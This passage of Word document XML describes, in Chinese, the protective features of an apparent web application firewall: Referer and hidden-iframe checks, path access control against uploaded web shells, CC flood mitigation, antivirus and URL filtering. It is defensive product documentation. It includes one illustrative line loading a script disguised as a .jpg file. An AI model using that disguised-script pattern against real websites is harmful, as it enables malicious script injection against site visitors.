          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>。检查</w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>referer</w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>域名，查看是否与</w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>host</w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>域名完全匹配或者是</w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>host</w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>域名的后缀，如果是则放行，如果不是则按配置进行阻断或记录日志。</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Iframe检查</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00856FBE" w:rsidRPr="009655A2" w:rsidRDefault="00856FBE" w:rsidP="00856FBE">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>有些</w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>XSS</w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>攻击也会在网页中加入隐藏的</w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>iframe</w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>并通过</w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>iframe</w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>的内容来实现，因此需要网页中</w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>iframe</w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>标签的</w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>height</w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>width</w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>属性做检测，屏蔽可能隐藏的风险。</w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>I</w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>frame检查就是通过对http传输的网页文件中iframe标签的大小进行检测，对低于配置大小的进行拦截。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00856FBE" w:rsidRDefault="00856FBE" w:rsidP="00856FBE">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>该功能是通过在</w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>HTML decoder</w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>解析</w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>iframe</w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>标签，对</w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>iframe</w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>width</w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>height</w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>属性进行检测，如果其中有一个小于等于配置的阈值，则进行告警或阻断</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访问控制：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00856FBE" w:rsidRPr="009655A2" w:rsidRDefault="00856FBE" w:rsidP="00856FBE">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>有些网站特别是论坛允许用户上传文件（如</w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>TXT</w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>gif</w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>等静态“文档”），但由于错误的文件类型过滤，可能会导致某些包含恶意代码的文件被上传到服务器上，例如</w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00856FBE" w:rsidRPr="009655A2" w:rsidRDefault="00856FBE" w:rsidP="00856FBE">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>上传了恶意的</w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>asp</w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>jsp</w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>php</w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>等</w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>web shell</w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>的木门</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00856FBE" w:rsidRPr="009655A2" w:rsidRDefault="00856FBE" w:rsidP="00856FBE">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>攻击者无论上传的文件如何命名，最终存储在服务器上的文件名后缀一定是动态脚本的扩展名</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00856FBE" w:rsidRPr="009655A2" w:rsidRDefault="00856FBE" w:rsidP="00856FBE">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>上传了恶意的</w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>js</w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>xss</w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>等客户端的木马</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00856FBE" w:rsidRPr="009655A2" w:rsidRDefault="00856FBE" w:rsidP="00856FBE">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>攻击者可以把动态的脚本文件名称成静态文件名上传，但是利用是一定会指示浏览器按照动态脚本的方式进行解析。</w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>&lt;script type="text/javascript" src="xxx.jpg"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00856FBE" w:rsidRDefault="00856FBE" w:rsidP="00856FBE">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>访问功能是用于限制对</w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">WEB </w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>服务器的某些特定的路径的访问，从而开控制恶意脚本的利用，此外有些</w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>web</w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>路径是用于管理用的，不希望对外开放，也可以通过这个功能进行限制</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CC防护：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00856FBE" w:rsidRPr="009655A2" w:rsidRDefault="00856FBE" w:rsidP="00856FBE">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>CC</w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>challenge collapsar</w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>）攻击的前身叫</w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Fatboy</w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>攻击，是利用不对对网站发送链接请求来达到拒绝服务的目的，是</w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>DDOS</w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>攻击的一种。</w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>CC</w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>攻击主要针对网站，通常攻击者通过控制多台“肉鸡”，或者通过代理，模拟多个用户不停的访问那些需要大量数据操作（需要消耗大量</w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>cpu</w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>资源）的页面，造成服务器一直有处理不完的攻击请求而无暇处理正常的访问。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00856FBE" w:rsidRPr="009655A2" w:rsidRDefault="00856FBE" w:rsidP="006019AE">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>CC防护通过</w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>http decoder</w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>对</w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>stream</w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>进行解析，获取访问的</w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>WEB</w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>访问的信息，包括访问的站点信息，</w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> x-real-ip </w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>x-forward-for</w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>VIA</w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>proxy-connection</w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>user_agent_via</w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>，源</w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>IP</w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>等信息，通过统计单位时间内对站点的访问量和每个源</w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>IP</w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>的访问量，连续</w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>20s</w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>内（该时间</w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>CLI</w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>上可配）对同一个站点的访问速度超过配置阈值后进入防护状态，后续的访问需要进行挑战认证，认证通过的会加入</w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ip</w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>信誉库，老化时间（默认</w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>720</w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>分钟）内不需要重新认证，启动防护期间单个</w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ip</w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>的访问速率超过配置的限速阈值则会根据动作进行重置或者阻断</w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>IP</w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>，若连续</w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>20s</w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>内访问的速</w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>率低于</w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>CC</w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>防护的阈值，则退出防护状态，不再进行挑战认证</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00856FBE" w:rsidRPr="009655A2" w:rsidRDefault="00856FBE" w:rsidP="00856FBE">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00856FBE" w:rsidRPr="006019AE" w:rsidRDefault="00856FBE" w:rsidP="006019AE">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006019AE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>攻击防护</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00856FBE" w:rsidRPr="009655A2" w:rsidRDefault="00856FBE" w:rsidP="00856FBE">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>移植防火墙的AD功能，支持多种畸形报文攻击防护，支持SYN Flood、DNS Query Flood 等多种 DoS/DDoS防护，支持ARP攻击防护功能</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00856FBE" w:rsidRPr="009655A2" w:rsidRDefault="00856FBE" w:rsidP="00856FBE">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00856FBE" w:rsidRPr="006019AE" w:rsidRDefault="00856FBE" w:rsidP="006019AE">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006019AE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>病毒过滤</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00856FBE" w:rsidRPr="009655A2" w:rsidRDefault="00856FBE" w:rsidP="00856FBE">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>移植防火墙AV的功能，基于流的病毒过滤，支持HTTP，SMTP，</w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>POP3</w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>，IMAP4,FTP协议的病毒过滤扫描，扫描文件类型支持包括GZIP,RAR,ZIP,BZIP2,TAR等压缩病毒文件，病毒库包含超过130万的病毒特征，病毒库支持网络实时更新</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00856FBE" w:rsidRPr="009655A2" w:rsidRDefault="00856FBE" w:rsidP="00856FBE">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00856FBE" w:rsidRPr="006019AE" w:rsidRDefault="00856FBE" w:rsidP="006019AE">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006019AE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>应用识别</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00856FBE" w:rsidRPr="009655A2" w:rsidRDefault="00856FBE" w:rsidP="00856FBE">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>全新一代基于应用特征、行为和关联信息的应用识别，支持应用类别、风险等级等多维度的应用定义，多达几千种的应用特征库，应用特征库支持网络实时更新</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00856FBE" w:rsidRPr="009655A2" w:rsidRDefault="00856FBE" w:rsidP="00856FBE">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00856FBE" w:rsidRPr="006019AE" w:rsidRDefault="00856FBE" w:rsidP="006019AE">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006019AE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>网页访问控制</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00856FBE" w:rsidRPr="009655A2" w:rsidRDefault="00856FBE" w:rsidP="00856FBE">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>移植防火墙的url过滤的功能，支持基于角色、时间、优先级、网页类别等条件的Web网页访问控制，支持自定义URL类别和url关键字，支持千万级URL特征库，URL库支持网络实时更新</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00856FBE" w:rsidRPr="009655A2" w:rsidRDefault="00856FBE" w:rsidP="00856FBE">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00856FBE" w:rsidRPr="006019AE" w:rsidRDefault="00856FBE" w:rsidP="006019AE">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
